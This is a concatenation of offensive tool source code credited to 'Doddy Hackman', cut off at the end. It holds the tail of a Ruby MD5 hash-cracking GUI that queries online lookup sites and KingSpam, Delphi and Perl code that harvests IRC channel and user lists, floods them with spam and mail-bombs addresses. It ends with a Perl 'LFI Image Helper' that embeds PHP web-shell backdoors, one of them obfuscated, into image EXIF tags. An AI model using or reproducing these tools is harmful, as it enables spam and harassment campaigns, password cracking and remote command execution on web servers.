code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/b>/
password = $1
console.insert("end","[+] md5online.net -> "+password+"\n" )
else
console.insert("end","[-] md5online.net -> Not Found" + "\n" )
end
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
console.insert("end","[+] md5.my-addr.co -> "+password+"\n")
else
console.insert("end","[-] md5.my-addr.co -> Not Found" +"\n")
end
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
console.insert("end","[+] md5decryption.com -> "+password+"\n")
else
console.insert("end","[-] md5decryption.com -> Not Found"+"\n")
end
console.insert("end","\n[+] Finished\n" )
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
// KingSpam 0.4
// (C) Doddy Hackman 2015
unit spam;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls,
Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus,
ShellApi;
type
TForm1 = class(TForm)
PageControl1: TPageControl;
TabSheet1: TTabSheet;
GroupBox1: TGroupBox;
Label1: TLabel;
host: TEdit;
Label2: TLabel;
port: TEdit;
Label3: TLabel;
nombre: TEdit;
Label4: TLabel;
canal: TEdit;
Label5: TLabel;
spam: TEdit;
Button1: TButton;
Button2: TButton;
Button3: TButton;
TabSheet2: TTabSheet;
GroupBox2: TGroupBox;
GroupBox3: TGroupBox;
canales: TListBox;
users: TListBox;
TabSheet3: TTabSheet;
GroupBox4: TGroupBox;
GroupBox5: TGroupBox;
lista_canales: TListBox;
console1: TMemo;
Label6: TLabel;
canal_agregar: TEdit;
Button4: TButton;
Button5: TButton;
TabSheet5: TTabSheet;
GroupBox8: TGroupBox;
console2: TMemo;
IdIRC1: TIdIRC;
Button9: TButton;
StatusBar1: TStatusBar;
GroupBox6: TGroupBox;
canal_spam_usuarios: TEdit;
TabSheet4: TTabSheet;
GroupBox7: TGroupBox;
Image2: TImage;
Label7: TLabel;
PopupMenu1: TPopupMenu;
L1: TMenuItem;
R1: TMenuItem;
OpenDialog1: TOpenDialog;
file_spam: TListBox;
spam_usuarios: TTimer;
Button11: TButton;
Button6: TButton;
otrospamfile: TListBox;
Image3: TImage;
procedure Button2Click(Sender: TObject);
procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
const AMessage: string);
procedure Button3Click(Sender: TObject);
procedure Button4Click(Sender: TObject);
procedure Button5Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure L1Click(Sender: TObject);
procedure R1Click(Sender: TObject);
procedure spam_usuariosTimer(Sender: TObject);
procedure Button11Click(Sender: TObject);
procedure Button6Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
buscando_usuarios: string;
buscando_canales: string;
control_guardar_canales: string;
control_guardar_users: string;
implementation
{$R *.dfm}
// Functions
procedure savefile(filename, texto: string);
var
ar: TextFile;
begin
AssignFile(ar, filename);
FileMode := fmOpenWrite;
if FileExists(filename) then
Append(ar)
else
Rewrite(ar);
Write(ar, texto + sLineBreak);
CloseFile(ar);
end;
procedure TForm1.Button11Click(Sender: TObject);
begin
StatusBar1.Panels[0].Text := '[+] Finished';
StatusBar1.Update;
IdIRC1.Disconnect;
spam_usuarios.Enabled := false;
end;
procedure TForm1.Button1Click(Sender: TObject);
var
i: integer;
contenido: TStringList;
stream: TFileStream;
begin
file_spam.Clear;
if OpenDialog1.Execute then
begin
spam.Text := OpenDialog1.filename;
contenido := TStringList.Create;
stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
contenido.LoadFromStream(stream);
for i := 0 to contenido.Count - 1 do
begin
file_spam.Items.Add(contenido[i]);
end;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
var
seleccion: integer;
begin
canales.Items.Clear;
buscando_canales := 'yes';
seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0);
if seleccion = mrYes then
begin
control_guardar_canales := 'yes';
end;
StatusBar1.Panels[0].Text := '[+] Searching channels ...';
StatusBar1.Update;
// IdIRC1.Disconnect;
IdIRC1.Nickname := nombre.Text;
IdIRC1.AltNickname := nombre.Text + '123';
IdIRC1.Username := nombre.Text;
IdIRC1.RealName := nombre.Text;
IdIRC1.Password := '';
IdIRC1.host := host.Text;
try
begin
IdIRC1.Connect;
IdIRC1.Raw('LIST');
end;
except
begin
ShowMessage('Error connecting');
end;
end;
if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then
begin
ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + host.Text +
'_canales.txt'), nil, nil, SW_SHOWNORMAL);
end;
end;
procedure TForm1.Button3Click(Sender: TObject);
var
seleccion: integer;
begin
users.Items.Clear;
buscando_usuarios := 'yes';
seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0);
if seleccion = mrYes then
begin
control_guardar_users := 'yes';
end;
StatusBar1.Panels[0].Text := '[+] Searching users ...';
StatusBar1.Update;
// IdIRC1.Disconnect;
IdIRC1.Nickname := nombre.Text;
IdIRC1.AltNickname := nombre.Text + '123';
IdIRC1.Username := nombre.Text;
IdIRC1.RealName := nombre.Text;
IdIRC1.Password := '';
IdIRC1.host := host.Text;
try
begin
IdIRC1.Connect;
IdIRC1.Join(canal.Text);
end;
except
begin
ShowMessage('Error connecting');
end;
end;
if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then
begin
ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text +
'_usuarios.txt'), nil, nil, SW_SHOWNORMAL);
end;
end;
procedure TForm1.Button4Click(Sender: TObject);
begin
lista_canales.Items.Add(canal_agregar.Text);
end;
procedure TForm1.Button5Click(Sender: TObject);
var
i: integer;
canal_z: string;
begin
StatusBar1.Panels[0].Text := '[+] Spamming channel ...';
StatusBar1.Update;
console1.Clear;
try
begin
IdIRC1.Nickname := nombre.Text;
IdIRC1.AltNickname := nombre.Text + '123';
IdIRC1.Username := nombre.Text;
IdIRC1.RealName := nombre.Text;
IdIRC1.Password := '';
IdIRC1.host := host.Text;
IdIRC1.Connect;
for i := 0 to lista_canales.Count - 1 do
begin
canal_z := lista_canales.Items[i];
IdIRC1.Join(canal_z);
console1.Lines.Add('[+] Spam in channel : ' + canal_z);
IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]);
Sleep(2000);
IdIRC1.Part(canal_z);
Sleep(2000);
end;
end;
except
ShowMessage('Error connecting');
end;
IdIRC1.Disconnect;
StatusBar1.Panels[0].Text := '[+] Finished';
StatusBar1.Update;
end;
procedure TForm1.Button6Click(Sender: TObject);
begin
StatusBar1.Panels[0].Text := '[+] Spamming users ...';
StatusBar1.Update;
IdIRC1.Nickname := nombre.Text;
IdIRC1.AltNickname := nombre.Text + '123';
IdIRC1.Username := nombre.Text;
IdIRC1.RealName := nombre.Text;
IdIRC1.Password := '';
IdIRC1.host := host.Text;
try
begin
IdIRC1.Connect;
IdIRC1.Join(canal_spam_usuarios.Text);
spam_usuarios.Interval := 10000;
spam_usuarios.Enabled := true;
end;
except
begin
ShowMessage('Error connecting');
end;
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
if not DirectoryExists('logs') then
begin
CreateDir('logs');
end;
OpenDialog1.InitialDir := GetCurrentDir;
end;
procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
const AMessage: string);
var
code: string;
regex: TPerlRegEx;
otroregex: TPerlRegEx;
canales_encontrados: string;
control: TPerlRegEx;
otrocontrol: TPerlRegEx;
i: integer;
i2: integer;
renicks: string;
listanow: TStringList;
arraynow: array of String;
begin
code := AMessage;
regex := TPerlRegEx.Create();
otroregex := TPerlRegEx.Create();
// console1.Lines.Add(code);
regex.regex := '322 (.*?) (.*?) (.*?) :';
regex.Subject := code;
if regex.Match then
begin
canales_encontrados := regex.Groups[2];
canales.Items.Add(canales_encontrados);
if (control_guardar_canales = 'yes') then
begin
savefile('logs/' + host.Text + '_canales.txt', canales_encontrados);
end;
end;
otroregex.regex := '353 (.*) = #(.*) :(.*)';
otroregex.Subject := code;
if otroregex.Match then
begin
renicks := otroregex.Groups[3];
renicks := StringReplace(renicks, nombre.Text, '', []);
listanow := TStringList.Create;
listanow.Delimiter := ' ';
listanow.DelimitedText := renicks;
for i2 := 0 to listanow.Count - 1 do
begin
users.Items.Add(listanow[i2]);
if (control_guardar_users = 'yes') then
begin
savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]);
end;
end;
end;
control := TPerlRegEx.Create();
control.regex := 'End of /LIST';
control.Subject := code;
if control.Match then
begin
if (buscando_canales = 'yes') then
begin
ShowMessage('Channels Loaded');
StatusBar1.Panels[0].Text := '[+] Channels Found';
StatusBar1.Update;
regex.Free;
IdIRC1.Disconnect;
IdIRC1.Destroy;
buscando_canales := 'no';
end;
end;
otrocontrol := TPerlRegEx.Create();
otrocontrol.regex := 'End of /NAMES';
otrocontrol.Subject := code;
if otrocontrol.Match then
begin
if (buscando_usuarios = 'yes') then
begin
ShowMessage('Users Loaded');
StatusBar1.Panels[0].Text := '[+] Users Found';
StatusBar1.Update;
otrocontrol.Free;
IdIRC1.Part(canal.Text);
IdIRC1.Disconnect;
IdIRC1.Destroy();
buscando_usuarios := 'no';
end;
end;
end;
procedure TForm1.L1Click(Sender: TObject);
var
i: integer;
contenido: TStringList;
stream: TFileStream;
begin
if OpenDialog1.Execute then
begin
contenido := TStringList.Create;
stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
contenido.LoadFromStream(stream);
for i := 0 to contenido.Count - 1 do
begin
lista_canales.Items.Add(contenido[i]);
end;
end;
end;
procedure TForm1.R1Click(Sender: TObject);
begin
lista_canales.Clear;
end;
procedure TForm1.spam_usuariosTimer(Sender: TObject);
var
i: integer;
begin
for i := 0 to users.Count - 1 do
begin
StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i];
StatusBar1.Update;
console2.Lines.Add('[+] Spamming to ' + users.Items[i]);
IdIRC1.Say(users.Items[i],
file_spam.Items[Random(file_spam.Count - 1) + 0]);
end;
end;
end.
// The End ?
#!usr/bin/perl
#King Spam 1.0
#(C) Doddy Hackman 2015
# SMTP Servers
#smtp.gmail.com - 465
#smtp.mail.yahoo.com -587
use IO::Socket;
use Color::Output;
Color::Output::Init;
use Getopt::Long;
#use Win32::OLE;
my $nick_secundario = "Cl4ptr4p";
my $timeout_secundario = "5";
GetOptions(
"get_channels=s" => \$get_channels,
"get_users=s" => \$get_users,
"spam_channel=s" => \$spam_channel,
"spam_channel_forever=s" => \$spam_channel_forever,
"spam_server=s" => \$spam_server,
"spam_servers_file=s" => \$spam_servers_file,
"spam_targets=s" => \$spam_targets,
"spam_file=s" => \$spam_file,
"channel=s" => \$channel,
"port=s" => \$port,
"nick=s" => \$nick,
"savefile=s" => \$file,
"timeout=s" => \$timeout,
"mailbomber" => \$mailbomber
);
head();
if ($get_channels) {
my $port_now = "";
my $nick_now = "";
my $file_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
if ( !$file ) {
$file_now = "";
}
else {
$file_now = $file;
}
listar_canales( $get_channels, $port_now, $nick_now, $file_now );
}
elsif ($get_users) {
my $port_now = "";
my $nick_now = "";
my $file_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
printear_titulo("[+] Serching users ...\n\n");
my @usuarios =
buscar_usuarios( $get_users, $port_now, $nick_now, $channel );
if ( int(@usuarios) eq "0" ) {
printear("[-] Users not found\n");
}
else {
printear("[+] Users Found : ");
print int(@usuarios) . "\n\n";
for my $usuario (@usuarios) {
printear("[+] User : ");
print $usuario. "\n";
savefile( $file, $usuario );
}
}
}
elsif ($spam_channel) {
my $port_now = "";
my $nick_now = "";
my $timeout_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
if ( !$timeout ) {
$timeout_now = $timeout_secundario;
}
else {
$timeout_now = $timeout;
}
spam_canal(
$spam_channel, $port_now, $nick_now,
$channel, $spam_file, $timeout_now
);
}
elsif ($spam_channel_forever) {
my $port_now = "";
my $nick_now = "";
my $timeout_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
if ( !$timeout ) {
$timeout_now = $timeout_secundario;
}
else {
$timeout_now = $timeout;
}
spam_canal_forever( $spam_channel_forever, $port_now, $nick_now,
$channel, $spam_file, $timeout_now );
}
elsif ($spam_server) {
my $port_now = "";
my $nick_now = "";
my $timeout_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
if ( !$timeout ) {
$timeout_now = $timeout_secundario;
}
else {
$timeout_now = $timeout;
}
my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now );
for my $encontrado (@encontrados) {
if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
my $canal = $1;
my $cantidad = $2;
spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file,
$timeout_now );
}
}
}
elsif ($spam_servers_file) {
my $port_now = "";
my $nick_now = "";
my $timeout_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
if ( !$timeout ) {
$timeout_now = $timeout_secundario;
}
else {
$timeout_now = $timeout;
}
unless ( -f $spam_servers_file ) {
printear("[-] File not found\n\n");
copyright();
}
else {
my @lista = loadfile($spam_servers_file);
printear("[+] Servers Found : ");
print int(@lista) . "\n";
printear_titulo(
"\n-------------------------------------------------------------\n"
);
for my $spam_server (@lista) {
chomp $spam_server;
my @encontrados =
buscar_canales( $spam_server, $port_now, $nick_now );
for my $encontrado (@encontrados) {
chomp $encontrado;
if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
my $canal = $1;
my $cantidad = $2;
spam_canal( $spam_server, $port_now, $nick_now, $canal,
$spam_file, $timeout_now );
printear_titulo(
"\n-------------------------------------------------------------\n"
);
}
}
}
}
}
elsif ($spam_targets) {
my $port_now = "";
my $nick_now = "";
my $timeout_now = "";
if ( !$port ) {
$port_now = "6667";
}
else {
$port_now = $port;
}
if ( !$nick ) {
$nick_now = $nick_secundario;
}
else {
$nick_now = $nick;
}
if ( !$timeout ) {
$timeout_now = $timeout_secundario;
}
else {
$timeout_now = $timeout;
}
if ( -f $spam_targets ) {
my @datos = loadfile($spam_targets);
printear("[+] Servers Found : ");
print int(@datos) . "\n";
printear_titulo(
"\n-------------------------------------------------------------\n"
);
for my $dato (@datos) {
chomp $dato;
if ( $dato =~ /(.*) --- (.*)/ ) {
my $server = $1;
my $canal = $2;
spam_canal( $server, $port_now, $nick_now, $canal, $spam_file,
$timeout_now );
printear_titulo(
"\n-------------------------------------------------------------\n"
);
}
}
}
else {
printear("\n[-] File not Found\n\n");
copyright();
}
}
elsif ($mailbomber) {
printear_titulo("[+] Spam Mails : OK\n\n\n");
printear("[+] Host : ");
chomp( my $host = <stdin> );
printear("\n[+] Port : ");
chomp( my $puerto = <stdin> );
printear("\n[+] Username : ");
chomp( my $username = <stdin> );
printear("\n[+] Password : ");
chomp( my $password = <stdin> );
printear("\n[+] Count Message : ");
chomp( my $count = <stdin> );
printear("\n[+] To : ");
chomp( my $to = <stdin> );
printear("\n[+] Subject : ");
chomp( my $asunto = <stdin> );
printear("\n[+] Body : ");
chomp( my $body = <stdin> );
printear("\n[+] File to Send : ");
chomp( my $file = <stdin> );
printear_titulo("\n[+] Starting ...\n\n");
for my $num ( 1 .. $count ) {
printear("[+] Sending Message : ");
print "$num\n";
sendmail(
$host, $puerto, $username, $password, $username, $username,
$username, $to, $asunto, $body, $file
);
}
printear_titulo("\n[+] Finished\n");
}
else {
sintax();
}
copyright();
# Functions
sub spam_canal {
my $hostname = $_[0];
my $port = $_[1];
my $nombre = $_[2];
my $canal = $_[3];
my $archivo = $_[4];
printear("[+] Connecting to ");
print $hostname. "\n\n";
my @nicks = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
my $contador = 0;
my $termine = 0;
my $timeout = $_[5];
my @spamnow = loadfile($archivo);
if (
my $socket = new IO::Socket::INET(
PeerAddr => $hostname,
PeerPort => $port,
Proto => "tcp"
)
)
{
print $socket "NICK $nombre\r\n";
print $socket "USER $nombre 1 1 1 1\r\n";
print $socket "JOIN $canal\r\n";
printear_titulo("[+] Users Found : ");
print int(@nicks) . "\n\n";
while ( my $log = <$socket> ) {
chomp $log;
if ( $log =~ /^PING(.*)$/i ) {
print $socket "PONG $1\r\n";
}
if ( $contador eq "0" ) {
printear("[+] Spam in channel : ");
print $canal. "\n";
sleep($timeout);
print $socket "PRIVMSG $canal "
. $spamnow[ rand(@spamnow) ] . "\r\n";
$contador++;
}
foreach $names (@nicks) {
chomp $names;
sleep($timeout);
unless ( $nombre eq $names ) {
$names =~ s/\@//;
$names =~ s/\+//;
print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
printear("[+] Spam to user $names : ");
print "OK\n";
}
$termine++;
}
if ( $termine eq int(@nicks) ) {
$socket->close();
last;
}
}
}
else {
printear("[-] Error\n");
$socket->close();
}
}
sub spam_canal_forever {
my $hostname = $_[0];
my $port = $_[1];
my $nombre = $_[2];
my $canal = $_[3];
my $archivo = $_[4];
printear("[+] Connecting to ");
print $hostname. "\n\n";
my @nicks = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
my $contador = 0;
my $termine = 0;
my $timeout = $_[5];
my @spamnow = loadfile($archivo);
if (
my $socket = new IO::Socket::INET(
PeerAddr => $hostname,
PeerPort => $port,
Proto => "tcp"
)
)
{
print $socket "NICK $nombre\r\n";
print $socket "USER $nombre 1 1 1 1\r\n";
print $socket "JOIN $canal\r\n";
printear_titulo("[+] Users Found : ");
print int(@nicks) . "\n\n";
while ( my $log = <$socket> ) {
chomp $log;
while (1) {
if ( $log =~ /^PING(.*)$/i ) {
print $socket "PONG $1\r\n";
}
if ( $contador eq "0" ) {
printear("[+] Spam in channel : ");
print $canal. "\n";
sleep($timeout);
print $socket "PRIVMSG $canal "
. $spamnow[ rand(@spamnow) ] . "\r\n";
$contador++;
}
foreach $names (@nicks) {
chomp $names;
sleep($timeout);
unless ( $nombre eq $names ) {
$names =~ s/\@//;
$names =~ s/\+//;
print $socket
"PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
printear("[+] Spam to user $names : ");
print "OK\n";
}
$termine++;
}
$contador = 0;
print "\n";
}
if ( $termine eq int(@nicks) ) {
$socket->close();
last;
}
}
}
else {
printear("[-] Error\n");
$socket->close();
}
}
sub buscar_usuarios {
my $hostname = $_[0];
my $port = $_[1];
my $nombre = $_[2];
my $canal = $_[3];
if (
my $socket = new IO::Socket::INET(
PeerAddr => $hostname,
PeerPort => $port,
Proto => "tcp"
)
)
{
print $socket "NICK $nombre\r\n";
print $socket "USER $nombre 1 1 1 1\r\n";
print $socket "JOIN $canal\r\n";
while ( my $log = <$socket> ) {
chomp $log;
if ( $log =~ /^PING(.*)$/i ) {
print $socket "PONG $1\r\n";
}
if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
my $pro = $4;
chop $pro;
$pro =~ s/$nombre//;
my @nicks = split " ", $pro;
$socket->close();
return @nicks;
}
}
}
}
sub buscar_canales {
my @resultado;
my $hostname = $_[0];
my $port = $_[1];
my $nombre = $_[2];
if (
my $socket = new IO::Socket::INET(
PeerAddr => $hostname,
PeerPort => $port,
Proto => "tcp"
)
)
{
print $socket "NICK $nombre\r\n";
print $socket "USER $nombre 1 1 1 1\r\n";
print $socket "LIST\r\n";
while ( my $log = <$socket> ) {
if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) {
my $canal = $2;
my $cantidad = $3;
push( @resultado, $canal . "-soy_un_limite-" . $cantidad );
}
if ( $log =~ /:End of \/LIST/ ) {
last;
}
}
$socket->close;
return @resultado;
}
}
sub listar_canales {
my $host = $_[0];
my $port = $_[1];
my $nick = $_[2];
my $file = $_[3];
printear_titulo("[+] Serching channels ...\n\n");
my @encontrados = buscar_canales( $host, $port, $nick );
if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) {
printear_titulo("[-] Channels not found\n");
}
else {
printearf_titulo( "Channels", "Users" );
print "\n";
for my $encontrado (@encontrados) {
if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
my $canal = $1;
my $cantidad = $2;
printearf( $canal, $cantidad );
if ( $file ne "" ) {
savefile( $file, $canal );
}
}
}
}
}
sub sendmail {
## Function Based on : http://code.activestate.com/lists/pdk/5351/
## Credits : Thanks to Phillip Richcreek and Eric Promislow
my (
$host, $port, $username, $password, $from, $cc,
$bcc, $to, $asunto, $mensaje, $file
) = @_;
$correo = Win32::OLE->new('CDO.Message');
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/sendusername',
$username );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/sendpassword',
$password );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpserverport',
$port );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 );
$correo->Configuration->Fields->Update();
if ( -f $file ) {
$correo->AddAttachment($file);
}
$correo->{From} = $from;
$correo->{CC} = $cc;
$correo->{BCC} = $bcc;
$correo->{To} = $to;
$correo->{Subject} = $asunto;
$correo->{TextBody} = $mensaje;
$correo->Send();
}
# More Functions
sub printearf_titulo {
cprintf( "\x0310" . "%-32s %s" . "\x030\n", $_[0], $_[1] );
}
sub printearf {
cprintf( "\x036" . "%-32s %s" . "\x030\n", $_[0], $_[1] );
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
return "";
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
return ""
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
return "";
}
sub savefile {
open( SAVE, ">>" . $_[0] );
print SAVE $_[1] . "\n";
close SAVE;
}
sub loadfile {
if ( -f $_[0] ) {
my @words;
my @r;
open( FILE, $_[0] );
@words = <FILE>;
close FILE;
for (@words) {
push( @r, $_ );
}
return (@r);
}
else {
printear("\n[-] File not found\n\n");
copyright();
}
}
sub sintax {
printear("[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print
"-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
print
"-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
print
"-spam_channel <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel\n";
print
"-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n";
print
"-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n";
print
"-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n";
print
"-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n";
print "-mailbomber : Open MailBomber\n";
printear("\n[+] Example : \n\n");
print "perl kingspam.pl -get_channels localhost\n";
print "perl kingspam.pl -get_users localhost -channel #locos\n";
print
"perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n";
print
"perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n";
print "perl kingspam.pl -spam_server localhost -spam_file c:/spam.txt\n";
print
"perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n";
print
"perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n";
print "perl kingspam.pl -mailbomber\n";
}
sub head {
printear_logo("\n-- == KingSpam 1.0 == --\n\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
exit(1);
}
# The End ?
#!usr/bin/perl
#LFI Image Helper 0.8
#(C) Doddy Hackman 2015
#ppm install http://trouchelle.com/ppm/Image-ExifTool.ppd
#
#Array @shells based on : OhNo - Evil Image Builder By Hood3dRob1n
#Thanks to Hood3dRob1n
#
#Dump Values
#Based on :http://www.nntp.perl.org/group/perl.beginners/2012/02/msg119913.html
#Thanks to Ken Slater
#
use Image::ExifTool;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
my @shells = (
{},
{
"nombre" => "Simple Backdoor",
"codigo" => '<?php system($_GET["cmd"]);exit(1); ?>',
"ejemplo" => "?cmd="
},
{
"nombre" => "System Shell",
"codigo" =>
'<?error_reporting(0);print(___);system($_REQUEST[cmd]);print(___);die;?>',
"ejemplo" => "?cmd="
},
{
"nombre" => "Eval Shell",
"codigo" =>
'<?error_reporting(0);print(___);eval($_REQUEST[cmd]);print(___);die;?>',
"ejemplo" => "?cmd="
},
{
"nombre" => "Sneaky Shell",
"codigo" =>
'<?php @$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] );?>',
"ejemplo" => "?0="
},
{
"nombre" => "r0ng Shell",
"codigo" =>
'<?if($_GET["r0ng"]){echo"<pre>".shell_exec($_GET["r0ng"]);}?>',
"ejemplo" => "?r0ng="
}
);
GetOptions(
"dump_all=s" => \$dump_all,
"dump_tags=s" => \$dump_tags,
"read_tag=s" => \$read_tag,
"tag=s" => \$tag,
"make_tag=s" => \$make_tag,
"value=s" => \$value,
"update_tag=s" => \$update_tag,
"delete_tag=s" => \$delete_tag,
"backdoor=s" => \$backdoor,
"bypass=s" => \$bypass,
"file=s" => \$file
);
head();
if ($dump_all) {
if ( -f $dump_all ) {
printear_titulo("[+] Finding information in : ");
print $dump_all. "\n\n";
dump_all($dump_all);
}
else {
printear("[-] File not found\n");
}
}
elsif ($dump_tags) {
if ( -f $dump_tags ) {
printear_titulo("[+] Finding tags in : ");
print $dump_tags. "\n\n";
dump_tags($dump_tags);
}
else {
printear("[-] File not found\n");
}
}
elsif ($read_tag) {
if ( -f $read_tag ) {
printear_titulo("[+] Finding tag value of $tag in : ");
print $read_tag. "\n\n";
read_tag( $read_tag, $tag );
}
else {
printear("[-] File not found\n");
}
}
elsif ($make_tag) {
if ( -f $make_tag ) {
printear_titulo("[+] Photo : ");
print $make_tag. "\n";
printear_titulo("[+] Name : ");
print $tag. "\n";
printear_titulo("[+] Value : ");
print $value. "\n\n";
printear("[+] Making tag $tag ...\n\n");
make_tag( $make_tag, $tag, $value );
}
else {
printear("[-] File not found\n");
}
}
elsif ($update_tag) {
if ( -f $update_tag ) {
printear_titulo("[+] Photo : ");
print $update_tag. "\n";
printear_titulo("[+] Name : ");
print $tag. "\n";
printear_titulo("[+] Value : ");
print $value. "\n\n";
printear("[+] Updating tag $tag ...\n\n");
update_tag( $update_tag, $tag, $value );
}
else {
printear("[-] File not found\n");
}
}
elsif ($delete_tag) {
if ( -f $delete_tag ) {
printear_titulo("[+] Deleting tag $tag in : ");
print $delete_tag. "\n\n";
delete_tag( $delete_tag, $tag );
}
else {
printear("[-] File not found\n");
}
}
elsif ($backdoor) {
if ( -f $backdoor ) {
printear_titulo("[+] Photo : ");
print $backdoor. "\n\n";
printear("[+] 1 : ");
print "Simple Backdoor\n";
printear("[+] 2 : ");
print "System Shell\n";
printear("[+] 3 : ");
print "Eval Shell\n";
printear("[+] 4 : ");
print "Sneaky Shell\n";
printear("[+] 5 : ");
print "r0ng Shell\n";
printear_titulo("\n[+] Option : ");
chomp( my $opcion = <stdin> );
backdoor_tag( $backdoor, $opcion, $file );
}
else {
printear("[-] File not found\n");
}
}
elsif ($bypass) {
if ( -f $bypass ) {
my $source = readfile($bypass);
printear_titulo("[+] PHP Shell : ");
print $bypass. "\n\n";
printear("[+] 1 : ");
print "bypass.jpg.php\n";
printear("[+] 2 : ");
